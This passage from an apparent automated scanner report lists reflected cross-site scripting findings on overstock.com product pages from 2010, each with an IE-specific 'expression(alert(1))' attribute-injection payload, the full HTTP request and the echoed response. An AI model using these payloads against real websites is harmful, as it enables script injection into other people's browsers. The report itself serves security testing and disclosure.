Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405161509:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:01 GMT; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="efaab"style="x:expression(alert(1))"b871a7a300a" value="1"/>
...[SNIP]...

2.87. http://www.overstock.com/Crafts-Sewing/Cricut-Personal-Electronic-Cutter/2917502/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Cricut-Personal-Electronic-Cutter/2917502/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8ae4"style%3d"x%3aexpression(alert(1))"5d2fb03e202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8ae4"style="x:expression(alert(1))"5d2fb03e202 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Cricut-Personal-Electronic-Cutter/2917502/product.html?f8ae4"style%3d"x%3aexpression(alert(1))"5d2fb03e202=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:05:49 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:05:49 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:49 GMT; Path=/
Set-Cookie: mxcproclicks=2917502|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:49 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405149617:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Cr
...[SNIP]...
<input type="hidden" name="f8ae4"style="x:expression(alert(1))"5d2fb03e202" value="1"/>
...[SNIP]...

2.88. http://www.overstock.com/Crafts-Sewing/Janome-Sew-Mini-Sewing-Machine-Refurbished/4395707/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Janome-Sew-Mini-Sewing-Machine-Refurbished/4395707/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb044"style%3d"x%3aexpression(alert(1))"bb9f44acd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb044"style="x:expression(alert(1))"bb9f44acd4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Janome-Sew-Mini-Sewing-Machine-Refurbished/4395707/product.html?bb044"style%3d"x%3aexpression(alert(1))"bb9f44acd4b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:41 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4395707|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:41 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408801080:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Ja
...[SNIP]...
<input type="hidden" name="bb044"style="x:expression(alert(1))"bb9f44acd4b" value="1"/>
...[SNIP]...

2.89. http://www.overstock.com/Crafts-Sewing/Shark-Mini-Portable-Dress-Maker-Sewing-Machine/4124237/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Shark-Mini-Portable-Dress-Maker-Sewing-Machine/4124237/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcafa"style%3d"x%3aexpression(alert(1))"f0fceb1f023 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcafa"style="x:expression(alert(1))"f0fceb1f023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Shark-Mini-Portable-Dress-Maker-Sewing-Machine/4124237/product.html?bcafa"style%3d"x%3aexpression(alert(1))"f0fceb1f023=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:08:06 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:08:06 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:08:06 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4124237|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:08:06 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405286476:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109807

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Sh
...[SNIP]...
<input type="hidden" name="bcafa"style="x:expression(alert(1))"f0fceb1f023" value="1"/>
...[SNIP]...

2.90. http://www.overstock.com/Crafts-Sewing/Silhouette-SD-Digital-Craft-Cutter-with-10-Gift-Card/4400810/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Silhouette-SD-Digital-Craft-Cutter-with-10-Gift-Card/4400810/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b09c"style%3d"x%3aexpression(alert(1))"053e4984f6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8b09c"style="x:expression(alert(1))"053e4984f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Silhouette-SD-Digital-Craft-Cutter-with-10-Gift-Card/4400810/product.html?8b09c"style%3d"x%3aexpression(alert(1))"053e4984f6d=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:07:16 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:07:16 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289405236211:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:07:16 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4400810|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:07:16 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Si
...[SNIP]...
<input type="hidden" name="8b09c"style="x:expression(alert(1))"053e4984f6d" value="1"/>
...[SNIP]...

2.91. http://www.overstock.com/Crafts-Sewing/Singer-Hand-held-Sewing-Machine/3128187/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Singer-Hand-held-Sewing-Machine/3128187/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db747"style%3d"x%3aexpression(alert(1))"fa26a77673c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db747"style="x:expression(alert(1))"fa26a77673c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Singer-Hand-held-Sewing-Machine/3128187/product.html?db747"style%3d"x%3aexpression(alert(1))"fa26a77673c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:05:16 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:05:16 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:16 GMT; Path=/
Set-Cookie: mxcproclicks=3128187|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:16 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405116027:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107524

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Si
...[SNIP]...
<input type="hidden" name="db747"style="x:expression(alert(1))"fa26a77673c" value="1"/>
...[SNIP]...

2.92. http://www.overstock.com/Crafts-Sewing/Sizzix-Big-Shot-Machine-with-BONUS-Embossing-Folder/4094572/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Sizzix-Big-Shot-Machine-with-BONUS-Embossing-Folder/4094572/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54724"style%3d"x%3aexpression(alert(1))"ad7d85b7c28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54724"style="x:expression(alert(1))"ad7d85b7c28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Sizzix-Big-Shot-Machine-with-BONUS-Embossing-Folder/4094572/product.html?54724"style%3d"x%3aexpression(alert(1))"ad7d85b7c28=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:05:48 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:05:48 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4094572|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:48 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405148156:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:48 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111290

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Si
...[SNIP]...
<input type="hidden" name="54724"style="x:expression(alert(1))"ad7d85b7c28" value="1"/>
...[SNIP]...

2.93. http://www.overstock.com/Electronics/50-foot-CAT5E-CAT5-Network-Ethernet-Cable/2541154/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/50-foot-CAT5E-CAT5-Network-Ethernet-Cable/2541154/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c59"style%3d"x%3aexpression(alert(1))"b06869b35b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8c59"style="x:expression(alert(1))"b06869b35b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/50-foot-CAT5E-CAT5-Network-Ethernet-Cable/2541154/product.html?b8c59"style%3d"x%3aexpression(alert(1))"b06869b35b8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:34 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:34 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408314051:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2541154|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:34 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:34 GMT; Path=/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111176

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>50
...[SNIP]...
<input type="hidden" name="b8c59"style="x:expression(alert(1))"b06869b35b8" value="1"/>
...[SNIP]...

2.94. http://www.overstock.com/Electronics/Black-6.5-foot-HDMI-HDMI-Cables-Set-of-2/2276116/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Black-6.5-foot-HDMI-HDMI-Cables-Set-of-2/2276116/product.html

Issue detail

